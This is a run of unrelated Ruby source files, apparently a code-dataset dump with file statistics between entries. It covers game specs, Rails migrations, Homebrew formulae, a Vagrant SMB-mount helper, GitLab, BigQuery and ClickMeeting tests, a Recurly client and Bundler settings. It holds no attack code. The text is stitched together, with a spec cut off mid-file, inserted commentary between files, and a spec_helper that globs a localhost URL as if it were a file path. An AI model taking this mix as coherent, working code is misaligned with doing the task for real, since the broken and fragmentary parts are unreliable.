context "#check_up" do
let(:game) {Game.new "User"}
let(:secret_code) {game.instance_variable_get(:@secret_code)}
before do
game.start
game.instance_variable_set(:@secret_code, "1233")
end
it "checks result size at most 4" do
expect(game.check_up("1323")).to have_at_most(4).items
end
it "checks result is a combination of + and -" do
expect(game.check_up("1534")).to match(/[\+\-]+/)
end
it "full match gives ++++" do
expect(game.check_up("1233")).to eq("++++")
end
it "mismatch gives ''" do
expect(game.check_up("5678")).to eq("")
end
it "checks with repetition in answer" do
expect(game.check_up("1111")).to eq("+")
end
it "checks with repetition in code" do
expect(game.check_up("3555")).to eq("-")
end
end
context "#hint" do
let(:game) {Game.new "User"}
let(:secret_code) {game.instance_variable_get(:@secret_code)}
before do
game.start
game.instance_variable_set(:@secret_code, "1233")
end
it "show number of secret code" do
expect(game.hint(0)).to eq("1")
end
it "deprives 30 score points" do
expect{game.hint(0)}.to change {game.user.score}
end
end
context "#save" do
let(:game) {Game.new "User"}
before do
game.start
end
xit "save info about user score and attempts" do
end
end
context "#game" do
let(:game) {Game.new "User"}
before do
game.start
end
it "" do
end
end
end
end
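
# API of the class under test, reconstructed from the expectations above
# (a sketch, not part of the spec file):
game = Codebreaker::Game.new("User")
game.start
game.check_up("1234") #=> a string of "+" and "-" marks, e.g. "++-"
game.hint(0)          #=> first digit of the secret code; costs 30 score points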

100000.times { Marshal.load(Marshal.dump(Time.now)) }

class ChangeOrderSubtotalAndTax < ActiveRecord::Migration[5.0]
def change
change_column :orders, :subtotal, "numeric USING CAST(subtotal AS numeric)"
change_column :orders, :subtotal, :decimal, precision: 9, scale: 2
change_column :orders, :tax, "numeric USING CAST(tax AS numeric)"
change_column :orders, :tax, :decimal, precision: 9, scale: 2
end
end

# This file is copied to ~/spec when you run 'ruby script/generate rspec'
# from the project root directory.
ENV["RAILS_ENV"] ||= 'test'
require File.dirname(__FILE__) + "/../config/environment" unless defined?(Rails.root)
require 'rspec/rails'
# Requires supporting files with custom matchers and macros, etc,
# in ./support/ and its subdirectories.
Dir["http://localhost:4567/support/**/*.rb"].each {|f| require f}
# Work around rspec not yet being ORM agnostic
DataMapper::Resource.module_eval do
def has_attribute?(attribute)
attributes.include?(attribute)
end
end
Rspec.configure do |config|
# Remove this line if you don't want Rspec's should and should_not
# methods or matchers
require 'rspec/expectations'
config.include Rspec::Matchers
config.before(:all) { DataMapper.auto_migrate! }
# == Mock Framework
#
# If you prefer to use mocha, flexmock or RR, uncomment the appropriate line:
#
# config.mock_with :mocha
# config.mock_with :flexmock
# config.mock_with :rr
config.mock_with :rspec
end

class FontGensekigothic < Formula
version "1.501"
sha256 "d4baad35c36428fe355648615c30bfb5f74bc1d4eca12e88af664a83fb7c7d6a"
url "https://github.com/ButTaiwan/genseki-font/releases/download/v#{version}/GenSekiGothic.zip"
desc "GenSekiGothic"
homepage "https://github.com/ButTaiwan/genseki-font"
def install
(share/"fonts").install "GenSekiGothic-B.ttc"
(share/"fonts").install "GenSekiGothic-H.ttc"
(share/"fonts").install "GenSekiGothic-L.ttc"
(share/"fonts").install "GenSekiGothic-M.ttc"
(share/"fonts").install "GenSekiGothic-R.ttc"
end
test do
end
end

class Bootstrap::BreadcrumbsController < Bootstrap::BaseBootstrapController
def index; end
end

require "shellwords"
module VagrantPlugins
module GuestLinux
module Cap
class MountSMBSharedFolder
def self.mount_smb_shared_folder(machine, name, guestpath, options)
expanded_guest_path = machine.guest.capability(
:shell_expand_guest_path, guestpath)
mount_commands = []
mount_device = "//#{options[:smb_host]}/#{name}"
if options[:owner].is_a? Integer
mount_uid = options[:owner]
else
mount_uid = "`id -u #{options[:owner]}`"
end
if options[:group].is_a? Integer
mount_gid = options[:group]
mount_gid_old = options[:group]
else
mount_gid = "`getent group #{options[:group]} | cut -d: -f3`"
mount_gid_old = "`id -g #{options[:group]}`"
end
# If a domain is provided in the username, separate it
username, domain = (options[:smb_username] || '').split('@', 2)
smb_password = options[:smb_password]
options[:mount_options] ||= []
options[:mount_options] << "sec=ntlm"
options[:mount_options] << "credentials=/etc/smb_creds_#{name}"
# First mount command uses getent to get the group
mount_options = "-o uid=#{mount_uid},gid=#{mount_gid}"
mount_options += ",#{options[:mount_options].join(",")}" if options[:mount_options]
mount_commands << "mount -t cifs #{mount_options} #{mount_device} #{expanded_guest_path}"
# Second mount command uses the old style `id -g`
mount_options = "-o uid=#{mount_uid},gid=#{mount_gid_old}"
mount_options += ",#{options[:mount_options].join(",")}" if options[:mount_options]
mount_commands << "mount -t cifs #{mount_options} #{mount_device} #{expanded_guest_path}"
# Create the guest path if it doesn't exist
machine.communicate.sudo("mkdir -p #{expanded_guest_path}")
# Write the credentials file
machine.communicate.sudo(<<-SCRIPT)
cat <<"EOF" >/etc/smb_creds_#{name}
username=#{username}
password=#{smb_password}
#{domain ? "domain=#{domain}" : ""}
EOF
chmod 0600 /etc/smb_creds_#{name}
SCRIPT
# Attempt to mount the folder. We retry here a few times because
# it can fail early on.
attempts = 0
while true
success = true
stderr = ""
mount_commands.each do |command|
no_such_device = false
stderr = ""
status = machine.communicate.sudo(command, error_check: false) do |type, data|
if type == :stderr
no_such_device = true if data =~ /No such device/i
stderr += data.to_s
end
end
success = status == 0 && !no_such_device
break if success
end
break if success
attempts += 1
if attempts > 10
command = mount_commands.join("\n")
command.gsub!(smb_password, "PASSWORDHIDDEN")
raise Vagrant::Errors::LinuxMountFailed,
command: command,
output: stderr
end
sleep 2
end
# Emit an upstart event if we can
machine.communicate.sudo <<-SCRIPT
if command -v /sbin/init && /sbin/init 2>/dev/null --version | grep upstart; then
/sbin/initctl emit --no-wait vagrant-mounted MOUNTPOINT='#{expanded_guest_path}'
fi
SCRIPT
end
end
end
end
end
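
# Invocation sketch (an assumption: Vagrant dispatches guest capabilities by
# name and supplies the machine argument itself; `machine` and all values
# below are hypothetical):
machine.guest.capability(
  :mount_smb_shared_folder, "projects", "/vagrant-projects",
  smb_host: "192.168.1.10", smb_username: "user@DOMAIN",
  smb_password: "secret", owner: "vagrant", group: "vagrant"
)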

module Jekyll
module Placeholders
class Generator < Jekyll::Generator
attr_accessor :site
def generate(site)
Jekyll::Placeholders::Collections.new(site)
end
end
end
end

class <%= file_name_camel %>Controller < ApplicationController
<%= controller_methods "actions/#{file_name}" %>
end

require 'models/runtime/domain'
module VCAP::CloudController
class SharedDomain < Domain
set_dataset(shared_domains)
add_association_dependencies routes: :destroy
export_attributes :name, :internal, :router_group_guid, :router_group_type
import_attributes :name, :internal, :router_group_guid
strip_attributes :name
attr_accessor :router_group_type
def as_summary_json
{
guid: guid,
name: name,
internal: internal,
router_group_guid: router_group_guid,
router_group_type: router_group_type
}
end
def self.find_or_create(name:, router_group_guid: nil, internal: false)
logger = Steno.logger('cc.db.domain')
domain = nil
Domain.db.transaction do
domain = SharedDomain.find(name: name)
if domain
logger.info "reusing default serving domain: #{name}"
if domain.internal? != !!internal
logger.warn("Domain '#{name}' already exists. Skipping updates of internal status")
end
if domain.router_group_guid != router_group_guid
logger.warn("Domain '#{name}' already exists. Skipping updates of router_group_guid")
end
else
logger.info "creating shared serving domain: #{name}"
domain = SharedDomain.create(name: name, router_group_guid: router_group_guid, internal: internal)
end
end
domain
rescue => e
err = e.class.new("Error for shared domain name #{name}: #{e.message}")
err.set_backtrace(e.backtrace)
raise err
end
def validate
super
validate_internal_domain if internal?
end
def shared?
true
end
def protocols
return ['tcp'] if self.tcp?
['http']
end
def tcp?
# If Kubernetes is enabled that implies that we are using istio, not the routing API
return false if k8s_enabled?
if router_group_guid.present?
if @router_group_type.nil?
router_group = routing_api_client.router_group(router_group_guid)
@router_group_type = router_group.nil? ? '' : router_group.type
end
return @router_group_type.eql?('tcp')
end
false
end
def addable_to_organization!(organization); end
def transient_attrs
router_group_type.blank? ? [] : [:router_group_type]
end
def internal?
!!internal
end
private
def routing_api_client
@routing_api_client ||= CloudController::DependencyLocator.instance.routing_api_client
end
def validate_internal_domain
if router_group_guid.present?
errors.add(:router_group_guid, 'cannot be specified for internal domains')
end
end
end
end

require 'spec_helper'
describe 'Admin::RequestsProfilesController' do
before do
FileUtils.mkdir_p(Gitlab::RequestProfiler::PROFILES_DIR)
sign_in(create(:admin))
end
after do
Gitlab::RequestProfiler.remove_all_profiles
end
describe 'GET /admin/requests_profiles' do
it 'shows the current profile token' do
allow(Rails).to receive(:cache).and_return(ActiveSupport::Cache::MemoryStore.new)
visit admin_requests_profiles_path
expect(page).to have_content("X-Profile-Token: #{Gitlab::RequestProfiler.profile_token}")
end
it 'lists all available profiles' do
time1 = 1.hour.ago
time2 = 2.hours.ago
time3 = 3.hours.ago
profile1 = "|gitlab-org|gitlab-ce_#{time1.to_i}.html"
profile2 = "|gitlab-org|gitlab-ce_#{time2.to_i}.html"
profile3 = "|gitlab-com|infrastructure_#{time3.to_i}.html"
FileUtils.touch("#{Gitlab::RequestProfiler::PROFILES_DIR}/#{profile1}")
FileUtils.touch("#{Gitlab::RequestProfiler::PROFILES_DIR}/#{profile2}")
FileUtils.touch("#{Gitlab::RequestProfiler::PROFILES_DIR}/#{profile3}")
visit admin_requests_profiles_path
within('.panel', text: '/gitlab-org/gitlab-ce') do
expect(page).to have_selector("a[href='#{admin_requests_profile_path(profile1)}']", text: time1.to_s(:long))
expect(page).to have_selector("a[href='#{admin_requests_profile_path(profile2)}']", text: time2.to_s(:long))
end
within('.panel', text: '/gitlab-com/infrastructure') do
expect(page).to have_selector("a[href='#{admin_requests_profile_path(profile3)}']", text: time3.to_s(:long))
end
end
end
describe 'GET /admin/requests_profiles/:profile' do
context 'when a profile exists' do
it 'displays the content of the profile' do
content = 'This is a request profile'
profile = "|gitlab-org|gitlab-ce_#{Time.now.to_i}.html"
File.write("#{Gitlab::RequestProfiler::PROFILES_DIR}/#{profile}", content)
visit admin_requests_profile_path(profile)
expect(page).to have_content(content)
end
end
context 'when a profile does not exist' do
it 'shows an error message' do
visit admin_requests_profile_path('|non|existent_12345.html')
expect(page).to have_content('Profile not found')
end
end
end
end

module Recurly
class Subscription < AccountBase
self.element_name = "subscription"
def self.known_attributes
[
"plan_code",
"coupon_code",
"unit_amount_in_cents",
"quantity",
"trial_ends_at"
]
end
# initialize associations
def initialize(attributes = {}, persisted = false)
attributes = attributes.with_indifferent_access
attributes[:account] ||= {}
attributes[:addons] ||= []
super
end
def self.refund(account_code, refund_type = :partial)
raise "Refund type must be :full, :partial, or :none." unless [:full, :partial, :none].include?(refund_type)
Subscription.delete(nil, {:account_code => account_code, :refund => refund_type})
end
# Terminates the subscription immediately and processes a full or partial refund
def refund(refund_type)
self.class.refund(self.subscription_account_code, refund_type)
end
def self.cancel(account_code)
Subscription.delete(account_code)
end
# Stops the subscription from renewing. The subscription remains valid until the end of
# the current term (current_period_ends_at).
def cancel(account_code = nil)
unless account_code.nil?
ActiveSupport::Deprecation.warn('Calling Recurly::Subscription#cancel with an account_code has been deprecated. Use the static method Recurly::Subscription.cancel(account_code) instead', caller)
end
self.class.cancel(account_code || self.subscription_account_code)
end
def self.reactivate(account_code, options = {})
path = "/accounts/#{CGI::escape(account_code.to_s)}/subscription/reactivate"
connection.post(path, "", headers)
rescue ActiveResource::Redirection => e
return true
end
def reactivate
self.class.reactivate(self.subscription_account_code)
end
# Valid timeframe: :now or :renewal
# Valid options: plan_code, quantity, unit_amount
def change(timeframe, options = {})
raise "Timeframe must be :now or :renewal." unless ['now','renewal'].include?(timeframe)
options[:timeframe] = timeframe
path = "/accounts/#{CGI::escape(self.subscription_account_code.to_s)}/subscription.xml"
connection.put(path,
self.class.format.encode(options, :root => :subscription),
self.class.headers)
rescue ActiveResource::ResourceInvalid => e
self.load_errors e.response.body
end
def subscription_account_code
acct_code = self.account_code if defined?(self.account_code) and !self.account_code.nil? and !self.account_code.blank?
acct_code ||= account.account_code if defined?(account) and !account.nil?
acct_code ||= self.primary_key if defined?(self.primary_key)
acct_code ||= self.id if defined?(self.id)
raise 'Missing Account Code' if acct_code.blank?
acct_code
end
end
end
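
# Usage sketch based on the class methods above (the account code is a
# hypothetical value):
Recurly::Subscription.cancel("account_code")        # stops renewal at term end
Recurly::Subscription.refund("account_code", :full) # terminates and refunds
Recurly::Subscription.reactivate("account_code")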

class CreateConfigurationScript < ActiveRecord::Migration
def change
create_table :configuration_scripts do |t|
t.belongs_to :configuration_manager, :type => :bigint
t.string :manager_ref
t.string :name
t.string :description
t.text :variables
t.timestamps :null => false
end
end
end

# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "helper"
describe Google::Cloud::Bigquery::Project, :copy, :mock_bigquery do
let(:source_dataset) { "source_dataset" }
let(:source_table_id) { "source_table_id" }
let(:source_table_name) { "Source Table" }
let(:source_description) { "This is the source table" }
let(:source_table_gapi) { random_table_gapi source_dataset,
source_table_id,
source_table_name,
source_description }
let(:source_table) { Google::Cloud::Bigquery::Table.from_gapi source_table_gapi,
bigquery.service }
let(:target_dataset) { "target_dataset" }
let(:target_table_id) { "target_table_id" }
let(:target_table_name) { "Target Table" }
let(:target_description) { "This is the target table" }
let(:target_table_gapi) { random_table_gapi target_dataset,
target_table_id,
target_table_name,
target_description }
let(:target_table) { Google::Cloud::Bigquery::Table.from_gapi target_table_gapi,
bigquery.service }
let(:target_table_other_proj_gapi) { random_table_gapi target_dataset,
target_table_id,
target_table_name,
target_description,
"target-project" }
let(:target_table_other_proj) { Google::Cloud::Bigquery::Table.from_gapi target_table_other_proj_gapi,
bigquery.service }
it "can copy a table" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
job_gapi = copy_job_gapi(source_table, target_table, location: nil)
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, [project, job_gapi]
result = bigquery.copy source_table, target_table
mock.verify
result.must_equal true
end
it "can copy to a table identified by a string" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
job_gapi = copy_job_gapi(source_table, target_table_other_proj, location: nil)
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, ["test-project", job_gapi]
result = bigquery.copy source_table, "target-project:target_dataset.target_table_id"
mock.verify
result.must_equal true
end
it "can copy to a dataset ID and table name string only" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
new_target_table = Google::Cloud::Bigquery::Table.from_gapi(
random_table_gapi(source_dataset,
"new_target_table_id",
target_table_name,
target_description),
bigquery.service
)
job_gapi = copy_job_gapi(source_table, new_target_table, location: nil)
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, [project, job_gapi]
result = bigquery.copy source_table, "source_dataset.new_target_table_id"
mock.verify
result.must_equal true
end
it "can copy a table with create disposition" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
job_gapi = copy_job_gapi(source_table, target_table, location: nil)
job_gapi.configuration.copy.create_disposition = "CREATE_NEVER"
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, [project, job_gapi]
result = bigquery.copy source_table, target_table, create: "CREATE_NEVER"
mock.verify
result.must_equal true
end
it "can copy a table with create disposition symbol" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
job_gapi = copy_job_gapi(source_table, target_table, location: nil)
job_gapi.configuration.copy.create_disposition = "CREATE_NEVER"
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, [project, job_gapi]
result = bigquery.copy source_table, target_table, create: :never
mock.verify
result.must_equal true
end
it "can copy a table with write disposition" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
job_gapi = copy_job_gapi(source_table, target_table, location: nil)
job_gapi.configuration.copy.write_disposition = "WRITE_TRUNCATE"
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, [project, job_gapi]
result = bigquery.copy source_table, target_table, write: "WRITE_TRUNCATE"
mock.verify
result.must_equal true
end
it "can copy a table with write disposition symbol" do
mock = Minitest::Mock.new
bigquery.service.mocked_service = mock
job_gapi = copy_job_gapi(source_table, target_table, location: nil)
job_gapi.configuration.copy.write_disposition = "WRITE_TRUNCATE"
job_resp_gapi = job_gapi.dup
job_resp_gapi.status = status "done"
mock.expect :insert_job, job_resp_gapi, [project, job_gapi]
result = bigquery.copy source_table, target_table, write: :truncate
mock.verify
result.must_equal true
end
end
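
# The client-side call these mocks exercise (a sketch reconstructed from the
# expectations above, not part of the spec file):
bigquery.copy source_table, target_table, create: :never, write: :truncate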

require "spec_helper"
describe Clickmeetings::PrivateLabel::Conference do
context '::by_account' do
context "without block" do
before { described_class.by_account(account_id: 1) }
after(:all) { described_class.by_account(account_id: nil) }
subject { described_class.account_id }
specify { expect(subject).to eq 1 }
context "gives account_id to objects" do
subject { described_class.new.account_id }
specify { expect(subject).to eq 1 }
end
end
context 'with block' do
subject do
described_class.by_account account_id: 1 do
described_class.account_id
end
end
it "uses specified account_id in block" do
expect(subject).to eq 1
end
it "hasn't account_id out of block" do
expect(described_class.account_id).to be_nil
end
end
end
context 'without account' do
context "::find" do
subject { described_class.find(1) }
specify do
expect { subject }.to raise_error Clickmeetings::PrivateLabel::Conference::NoAccountError
end
end
%w(all create).each do |method|
context "::#{method}" do
subject { described_class.send method }
specify do
expect { subject }.to raise_error Clickmeetings::PrivateLabel::Conference::NoAccountError
end
end
end
%w(update destroy).each do |method|
context "##{method}" do
subject { described_class.new.send(method) }
specify do
expect { subject }.to raise_error Clickmeetings::PrivateLabel::Conference::NoAccountError
end
end
end
end
context "with account" do
before { described_class.by_account(account_id: 1) }
after(:all) { described_class.by_account(account_id: nil) }
context '::find' do
subject { described_class.find(1) }
before(:each) { mock_api(:get, 'accounts/1/conferences/1') }
it "responds with Conference object" do
expect(subject).to be_instance_of described_class
end
end
context '::all' do
before(:each) { mock_api(:get, "accounts/1/conferences") }
subject { described_class.all }
it_behaves_like 'conferences list'
end
context '::create' do
before(:each) { mock_api(:post, "accounts/1/conferences", 201) }
let(:params) do
{
name: "New Api Room",
room_name: "new_api_room",
lobby_description: "Wait some minutes",
room_type: "webinar",
permanent_room: 0,
starts_at: "2016-11-04T23:44:39+0300",
ends_at: "2016-11-05T23:44:39+0300",
lobby_enabled: 1,
access_type: 1,
password: "qwerty"
}
end
subject { described_class.create params }
it "returns Conference object" do
expect(subject).to be_an_instance_of(described_class)
end
it "has correct properties", :aggregate_failures do
expect(subject.access_role_hashes).to eq({
"listener" => "0cb61e2dd0ae19c8eb252900581baedc",
"presenter" => "acd6afeeb487cd1eb6985e00581baedc",
"host" => "49b57914e6d00ed141ea1e00581baedc"
})
expect(subject.access_type).to eq 1
expect(subject.account_id).to eq 1
expect(subject.ccc).to eq "2016-11-04 20:44:00"
expect(subject.created_at).to eq "2016-11-03T21:40:44+00:00"
expect(subject.description).to eq ""
expect(subject.embed_room_url).to eq "http://embed.anysecond.com/embed_conference.html?r=16531165866647"
expect(subject.ends_at).to eq "2016-11-04T23:44:00+00:00"
expect(subject.id).to eq 1
expect(subject.lobby_description).to eq "Wait some minutes"
expect(subject.name).to eq "newnewn"
expect(subject.name_url).to eq "newnewn"
expect(subject.permanent_room).to be_falsey
expect(subject.phone_listener_pin).to eq 869828
expect(subject.phone_presenter_pin).to eq 538883
expect(subject.recorder_list).to be_empty
expect(subject.room_pin).to eq 884449349
expect(subject.room_type).to eq "webinar"
expect(subject.room_url).to eq "http://testapi.anysecond.com/newnewn"
expect(subject.starts_at).to eq "2016-11-04T20:44:00+00:00"
expect(subject.status).to eq "active"
expect(subject.updated_at).to eq "2016-11-03T21:40:44+00:00"
end
end
context '#update' do
let(:object) { described_class.new(id: 1, access_type: 3, name: 'New Name') }
subject { object.update access_type: 1 }
before(:each) { mock_api(:put, 'accounts/1/conferences/1') }
specify { expect(subject).to be_an_instance_of described_class }
it "returns updated object" do
expect(subject.access_type).to eq 1
end
end
context "#destroy" do
let(:object) { described_class.new(id: 1, name: "Name") }
subject { object.destroy }
before(:each) { mock_api(:delete, 'accounts/1/conferences/1') }
specify { expect(subject).to be_an_instance_of described_class }
end
end
end
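
# Implied usage of the scoping API exercised above (a sketch; account_id 1 is
# taken from the examples):
Clickmeetings::PrivateLabel::Conference.by_account(account_id: 1) do
  Clickmeetings::PrivateLabel::Conference.all
end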

class AchievementPolicy < ApplicationPolicy
def show?
create? || !user.blocked_by?(record.user) && !user.blocked?(record.user)
end
def index?
show?
end
def create?
record.user_id == user.id
end
def update?
create?
end
def destroy?
create?
end
def next_id?
show?
end
def previous_id?
show?
end
def new_form_fields?
create?
end
end | 11.542857 | 76 | 0.621287 |
0163939b08df8848a9029f60be97e806126c349f | 1,260 | require 'formula'
require File.expand_path("../../Requirements/php-meta-requirement", __FILE__)
class Phppgadmin < Formula
homepage 'http://phppgadmin.sourceforge.net/'
url 'https://downloads.sourceforge.net/project/phppgadmin/phpPgAdmin%20%5Bstable%5D/phpPgAdmin-5.1/phpPgAdmin-5.1.tar.gz'
sha1 'ef90fc9942c67ab95f063cacc43911a40d34fbc1'
depends_on PhpMetaRequirement
def install
(share+'phppgadmin').install Dir['*']
end
def caveats; <<-EOS.undent
    Note that this formula will NOT install PostgreSQL. It is not
    required, since you may want to connect to a remote database
    server.
Edit #{HOMEBREW_PREFIX}/share/phppgadmin/conf/config.inc.php to add needed PostgreSQL servers.
    Webserver configuration example (add this at the end of
    your /etc/apache2/httpd.conf, for instance):
Alias /phppgadmin #{HOMEBREW_PREFIX}/share/phppgadmin
<Directory #{HOMEBREW_PREFIX}/share/phppgadmin/>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
Allow from all
</Directory>
Then, restart your web server and open http://localhost/phppgadmin
    More documentation: http://phppgadmin.sourceforge.net/doku.php?id=faq_docs
EOS
end
end
| 34.054054 | 123 | 0.736508 |
6a29066f8c3246571b01eb30f99878f5d0439aca | 895 | # == Schema Information
#
# Table name: categories
#
# id :integer not null, primary key
# name :string not null
# slug :string not null
# created_at :datetime not null
# updated_at :datetime not null
# description :text
#
class CategoriesController < ApplicationController
before_action :doorkeeper_authorize!, only: [:create]
def index
authorize Category
render json: Category.all
end
def show
category = Category.find(params[:id])
authorize category
render json: category
end
def create
category = Category.new(permitted_params)
authorize category
if category.save
render json: category
else
render_validation_errors category.errors
end
end
private
def permitted_params
record_attributes.permit(:name, :description)
end
end
| 19.042553 | 55 | 0.651397 |
5d174005297c155a4224802dbe97d6cca7c247a6 | 90 | require 'rails_helper'
RSpec.describe CalorieCountsController, type: :controller do
end
| 15 | 60 | 0.822222 |
bf465f8eec8414f371e6c4c3a79189063fdb5bcb | 6,680 | require "uri"
module Bundler
class Settings
BOOL_KEYS = %w(frozen cache_all no_prune disable_local_branch_check ignore_messages gem.mit gem.coc).freeze
NUMBER_KEYS = %w(retry timeout redirect).freeze
DEFAULT_CONFIG = { :retry => 3, :timeout => 10, :redirect => 5 }
def initialize(root = nil)
@root = root
@local_config = load_config(local_config_file)
@global_config = load_config(global_config_file)
end
def [](name)
key = key_for(name)
value = (@local_config[key] || ENV[key] || @global_config[key] || DEFAULT_CONFIG[name])
case
when value.nil?
nil
when is_bool(name) || value == "false"
to_bool(value)
when is_num(name)
value.to_i
else
value
end
end
def []=(key, value)
local_config_file or raise GemfileNotFound, "Could not locate Gemfile"
set_key(key, value, @local_config, local_config_file)
end
alias_method :set_local, :[]=
def delete(key)
@local_config.delete(key_for(key))
end
def set_global(key, value)
set_key(key, value, @global_config, global_config_file)
end
def all
env_keys = ENV.keys.select {|k| k =~ /BUNDLE_.*/ }
keys = @global_config.keys | @local_config.keys | env_keys
keys.map do |key|
key.sub(/^BUNDLE_/, "").gsub(/__/, ".").downcase
end
end
def local_overrides
repos = {}
all.each do |k|
if k =~ /^local\./
repos[$'] = self[k]
end
end
repos
end
def mirror_for(uri)
uri = URI(uri.to_s) unless uri.is_a?(URI)
# Settings keys are all downcased
normalized_key = normalize_uri(uri.to_s.downcase)
gem_mirrors[normalized_key] || uri
end
def credentials_for(uri)
self[uri.to_s] || self[uri.host]
end
def gem_mirrors
all.inject({}) do |h, k|
if k =~ /^mirror\./
uri = normalize_uri($')
h[uri] = normalize_uri(self[k])
end
h
end
end
def locations(key)
key = key_for(key)
locations = {}
locations[:local] = @local_config[key] if @local_config.key?(key)
locations[:env] = ENV[key] if ENV[key]
locations[:global] = @global_config[key] if @global_config.key?(key)
locations[:default] = DEFAULT_CONFIG[key] if DEFAULT_CONFIG.key?(key)
locations
end
def pretty_values_for(exposed_key)
key = key_for(exposed_key)
locations = []
if @local_config.key?(key)
locations << "Set for your local app (#{local_config_file}): #{@local_config[key].inspect}"
end
if value = ENV[key]
locations << "Set via #{key}: #{value.inspect}"
end
if @global_config.key?(key)
locations << "Set for the current user (#{global_config_file}): #{@global_config[key].inspect}"
end
return ["You have not configured a value for `#{exposed_key}`"] if locations.empty?
locations
end
def without=(array)
set_array(:without, array)
end
def with=(array)
set_array(:with, array)
end
def without
get_array(:without)
end
def with
get_array(:with)
end
# @local_config["BUNDLE_PATH"] should be prioritized over ENV["BUNDLE_PATH"]
def path
key = key_for(:path)
path = ENV[key] || @global_config[key]
return path if path && !@local_config.key?(key)
if path = self[:path]
"#{path}/#{Bundler.ruby_scope}"
else
Bundler.rubygems.gem_dir
end
end
def allow_sudo?
!@local_config.key?(key_for(:path))
end
def ignore_config?
ENV["BUNDLE_IGNORE_CONFIG"]
end
def app_cache_path
@app_cache_path ||= begin
path = self[:cache_path] || "vendor/cache"
raise InvalidOption, "Cache path must be relative to the bundle path" if path.start_with?("/")
path
end
end
private
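    # Maps a setting name onto its BUNDLE_* key. Illustrative examples:
    # key_for(:frozen)      #=> "BUNDLE_FROZEN"
    # key_for("local.rack") #=> "BUNDLE_LOCAL__RACK"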
def key_for(key)
if key.is_a?(String) && /https?:/ =~ key
key = normalize_uri(key).to_s
end
key = key.to_s.gsub(".", "__").upcase
"BUNDLE_#{key}"
end
    def parent_setting_for(name)
      split_specific_setting_for(name)[0]
    end
    def specific_gem_for(name)
      split_specific_setting_for(name)[1]
    end
    def split_specific_setting_for(name)
      name.split(".")
    end
def is_bool(name)
BOOL_KEYS.include?(name.to_s) || BOOL_KEYS.include?(parent_setting_for(name.to_s))
end
def to_bool(value)
!(value.nil? || value == "" || value =~ /^(false|f|no|n|0)$/i || value == false)
end
def is_num(value)
NUMBER_KEYS.include?(value.to_s)
end
def get_array(key)
self[key] ? self[key].split(":").map(&:to_sym) : []
end
def set_array(key, array)
self[key] = (array.empty? ? nil : array.join(":")) if array
end
def set_key(key, value, hash, file)
key = key_for(key)
unless hash[key] == value
hash[key] = value
hash.delete(key) if value.nil?
FileUtils.mkdir_p(file.dirname)
require "bundler/psyched_yaml"
File.open(file, "w") {|f| f.puts YAML.dump(hash) }
end
value
rescue Errno::EACCES
raise PermissionError.new(file)
end
def global_config_file
file = ENV["BUNDLE_CONFIG"] || File.join(Bundler.rubygems.user_home, ".bundle/config")
Pathname.new(file)
end
def local_config_file
Pathname.new(@root).join("config") if @root
end
def load_config(config_file)
valid_file = config_file && config_file.exist? && !config_file.size.zero?
if !ignore_config? && valid_file
config_regex = /^(BUNDLE_.+): (['"]?)(.*(?:\n(?!BUNDLE).+)?)\2$/
raise PermissionError.new(config_file, :read) unless config_file.readable?
config_pairs = config_file.read.scan(config_regex).map do |m|
key, _, value = m
[convert_to_backward_compatible_key(key), value.gsub(/\s+/, " ").tr('"', "'")]
end
Hash[config_pairs]
else
{}
end
end
def convert_to_backward_compatible_key(key)
key = "#{key}/" if key =~ /https?:/i && key !~ %r[/\Z]
key = key.gsub(".", "__") if key.include?(".")
key
end
# TODO: duplicates Rubygems#normalize_uri
# TODO: is this the correct place to validate mirror URIs?
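    # Illustrative: normalize_uri("https://example.org") returns
    # URI("https://example.org/"), appending the trailing slash if missing.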
def normalize_uri(uri)
uri = uri.to_s
uri = "#{uri}/" unless uri =~ %r[/\Z]
uri = URI(uri)
unless uri.absolute?
raise ArgumentError, "Gem sources must be absolute. You provided '#{uri}'."
end
uri
end
end
end
| 25.30303 | 111 | 0.591916 |
ac1120901c4f4305ad5b3f9bffe1d584e4fca83d | 608 | # coding: utf-8
require "erb"
module Reink
module Epub
class TocXhtml
include ERB::Util
def initialize
@items = []
@template = File.open(File.join(File.dirname(__FILE__), "toc.xhtml.erb"), "rb:utf-8") { |file| file.read }
end
attr_accessor :items
def to_s
return ERB.new(@template, nil, "-").result(binding)
end
end
end
end
if $0 == __FILE__
toc_xhtml = Reink::Epub::TocXhtml.new
toc_xhtml.items << {:href => "HREF1", :title => "TITLE1"}
toc_xhtml.items << {:href => "HREF2", :title => "TITLE2"}
puts(toc_xhtml.to_s)
end
| 19.612903 | 114 | 0.595395 |
ffc6b0862b0c6397ae938292228a73437dedef11 | 124 | # frozen_string_literal: true
class PostsController < WulinMaster::ScreenController
controller_for_screen PostScreen
end
| 20.666667 | 53 | 0.854839 |
ab4cabe9a6f0c7e68bee180d967a726b3e976ce6 | 471 | cask 'font-oleo-script' do
version :latest
sha256 :no_check
# github.com/google/fonts was verified as official when first introduced to the cask
url 'https://github.com/google/fonts/trunk/ofl/oleoscript',
using: :svn,
revision: '50',
trust_cert: true
name 'Oleo Script'
homepage 'https://www.google.com/fonts/specimen/Oleo%20Script'
depends_on macos: '>= :sierra'
font 'OleoScript-Bold.ttf'
font 'OleoScript-Regular.ttf'
end
